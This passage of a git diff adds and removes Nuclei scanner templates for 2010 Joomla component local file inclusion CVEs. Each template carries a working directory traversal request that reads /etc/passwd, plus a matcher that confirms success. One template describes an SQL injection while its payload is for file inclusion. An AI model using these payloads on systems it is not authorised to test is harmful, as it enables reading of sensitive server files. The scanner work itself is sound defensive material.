- - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1219.yaml b/nuclei-templates/CVE-2010/cve-2010-1219.yaml
new file mode 100644
index 0000000000..904655afb1
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1219.yaml
@@ -0,0 +1,26 @@
+id: CVE-2010-1219
+info:
+ name: Joomla! Component com_janews - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/11757
+ - https://www.cvedetails.com/cve/CVE-2010-1219
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1302.yaml b/nuclei-templates/CVE-2010/cve-2010-1302.yaml
deleted file mode 100644
index 90c52b2f83..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-1302.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-1302
-
-info:
- name: Joomla! Component DW Graph - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/11978
- - https://www.cvedetails.com/cve/CVE-2010-1302
- tags: cve,cve2010,joomla,lfi,graph
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1304.yaml b/nuclei-templates/CVE-2010/cve-2010-1304.yaml
deleted file mode 100644
index bacd107b78..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-1304.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-1304
-
-info:
- name: Joomla! Component User Status - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/11998
- - https://www.cvedetails.com/cve/CVE-2010-1304
- tags: cve,cve2010,joomla,lfi,status
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1305.yaml b/nuclei-templates/CVE-2010/cve-2010-1305.yaml
deleted file mode 100644
index ca2155a2d3..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-1305.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-1305
-
-info:
- name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12065
- - https://www.cvedetails.com/cve/CVE-2010-1305
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1315.yaml b/nuclei-templates/CVE-2010/cve-2010-1315.yaml
new file mode 100644
index 0000000000..43663eef51
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1315.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1315
+
+info:
+ name: Joomla! Component webERPcustomer - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/11999
+ - https://www.cvedetails.com/cve/CVE-2010-1315
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1345.yaml b/nuclei-templates/CVE-2010/cve-2010-1345.yaml
deleted file mode 100644
index 814e4ab08a..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-1345.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-1345
-
-info:
- name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/15453
- - https://www.cvedetails.com/cve/CVE-2010-1345
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1352.yaml b/nuclei-templates/CVE-2010/cve-2010-1352.yaml
deleted file mode 100644
index 5dd77fa70f..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-1352.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-1352
-
-info:
- name: Joomla! Component Juke Box 1.7 - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12084
- - https://www.cvedetails.com/cve/CVE-2010-1352
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1354.yaml b/nuclei-templates/CVE-2010/cve-2010-1354.yaml
new file mode 100644
index 0000000000..2b37852cfc
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1354.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1354
+
+info:
+ name: Joomla! Component VJDEO 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12102
+ - https://www.cvedetails.com/cve/CVE-2010-1354
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1461.yaml b/nuclei-templates/CVE-2010/cve-2010-1461.yaml
deleted file mode 100644
index 1e3d3663a4..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-1461.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-1461
-
-info:
- name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
- reference: |
- - https://www.exploit-db.com/exploits/12232
- - https://www.cvedetails.com/cve/CVE-2010-1461
- tags: cve,cve2010,joomla,lfi,photo
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1470.yaml b/nuclei-templates/CVE-2010/cve-2010-1470.yaml
deleted file mode 100644
index bcb3e84703..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-1470.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-1470
-
-info:
- name: Joomla! Component Web TV 1.0 - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12166
- - https://www.cvedetails.com/cve/CVE-2010-1470
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1471.yaml b/nuclei-templates/CVE-2010/cve-2010-1471.yaml
new file mode 100644
index 0000000000..b68e50d8b6
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1471.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1471
+
+info:
+ name: Joomla! Component Address Book 1.5.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12170
+ - https://www.cvedetails.com/cve/CVE-2010-1471
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1476.yaml b/nuclei-templates/CVE-2010/cve-2010-1476.yaml
deleted file mode 100644
index c1718acac9..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-1476.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-1476
-
-info:
- name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12150
- - https://www.cvedetails.com/cve/CVE-2010-1476
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1478.yaml b/nuclei-templates/CVE-2010/cve-2010-1478.yaml
new file mode 100644
index 0000000000..850f9aa938
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1478.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1478
+
+info:
+ name: Joomla! Component Jfeedback 1.2 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/12145
+ - https://www.cvedetails.com/cve/CVE-2010-1478
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-1491.yaml b/nuclei-templates/CVE-2010/cve-2010-1491.yaml
new file mode 100644
index 0000000000..865fd5f04f
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1491.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1491
+
+info:
+ name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12318
+ - https://www.cvedetails.com/cve/CVE-2010-1491
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-1494.yaml b/nuclei-templates/CVE-2010/cve-2010-1494.yaml
new file mode 100644
index 0000000000..290ff32940
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1494.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1494
+
+info:
+ name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12113
+ - https://www.cvedetails.com/cve/CVE-2010-1494
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1532.yaml b/nuclei-templates/CVE-2010/cve-2010-1532.yaml
new file mode 100644
index 0000000000..594664996b
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1532.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1532
+
+info:
+ name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12118
+ - https://www.cvedetails.com/cve/CVE-2010-1532
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1535.yaml b/nuclei-templates/CVE-2010/cve-2010-1535.yaml
new file mode 100644
index 0000000000..f4ad1e3c80
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1535.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1535
+
+info:
+ name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12151
+ - https://www.cvedetails.com/cve/CVE-2010-1535
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1653.yaml b/nuclei-templates/CVE-2010/cve-2010-1653.yaml
new file mode 100644
index 0000000000..fdc3e5d2a7
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1653.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1653
+
+info:
+ name: Joomla! Component Graphics 1.0.6 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information.
+ reference:
+ - https://www.exploit-db.com/exploits/12430
+ - https://www.cvedetails.com/cve/CVE-2010-1653
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-1657.yaml b/nuclei-templates/CVE-2010/cve-2010-1657.yaml
new file mode 100644
index 0000000000..b3bc8509e7
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1657.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1657
+
+info:
+ name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12428
+ - https://www.cvedetails.com/cve/CVE-2010-1657
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1658.yaml b/nuclei-templates/CVE-2010/cve-2010-1658.yaml
new file mode 100644
index 0000000000..1996fbeb69
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1658.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1658
+
+info:
+ name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12427
+ - https://www.cvedetails.com/cve/CVE-2010-1658
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-1659.yaml b/nuclei-templates/CVE-2010/cve-2010-1659.yaml
deleted file mode 100644
index fb4d569289..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-1659.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-1659
-
-info:
- name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12426
- - https://www.cvedetails.com/cve/CVE-2010-1659
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1714.yaml b/nuclei-templates/CVE-2010/cve-2010-1714.yaml
new file mode 100644
index 0000000000..6ff7a55726
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1714.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1714
+
+info:
+ name: Joomla! Component Arcade Games 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12168
+ - https://www.cvedetails.com/cve/CVE-2010-1714
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1715.yaml b/nuclei-templates/CVE-2010/cve-2010-1715.yaml
deleted file mode 100644
index 6eabdff378..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-1715.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-1715
-
-info:
- name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information.
- reference:
- - https://www.exploit-db.com/exploits/12174
- - https://www.cvedetails.com/cve/CVE-2010-1715
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-1717.yaml b/nuclei-templates/CVE-2010/cve-2010-1717.yaml
new file mode 100644
index 0000000000..cb08bb4b40
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1717.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1717
+
+info:
+ name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12291
+ - https://www.cvedetails.com/cve/CVE-2010-1717
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1873.yaml b/nuclei-templates/CVE-2010/cve-2010-1873.yaml
deleted file mode 100644
index 4331b8702c..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-1873.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-1873
-
-info:
- name: Joomla! Component Jvehicles - Local File Inclusion
- author: daffainfo
- severity: high
- description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php.
- reference:
- - https://www.exploit-db.com/exploits/11997
- - https://www.cvedetails.com/cve/CVE-2010-1873
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-1952.yaml b/nuclei-templates/CVE-2010/cve-2010-1952.yaml
deleted file mode 100644
index 5e71f4a39f..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-1952.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-1952
-
-info:
- name: Joomla! Component BeeHeard 1.0 - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12239
- - https://www.cvedetails.com/cve/CVE-2010-1952
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1954.yaml b/nuclei-templates/CVE-2010/cve-2010-1954.yaml
new file mode 100644
index 0000000000..15235070e6
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1954.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1954
+
+info:
+ name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12287
+ - https://www.cvedetails.com/cve/CVE-2010-1954
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1956.yaml b/nuclei-templates/CVE-2010/cve-2010-1956.yaml
deleted file mode 100644
index a9e931f712..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-1956.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-1956
-
-info:
- name: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12285
- - https://www.cvedetails.com/cve/CVE-2010-1956
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1957.yaml b/nuclei-templates/CVE-2010/cve-2010-1957.yaml
deleted file mode 100644
index 7f16c277c4..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-1957.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-1957
-
-info:
- name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12235
- - https://www.cvedetails.com/cve/CVE-2010-1957
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
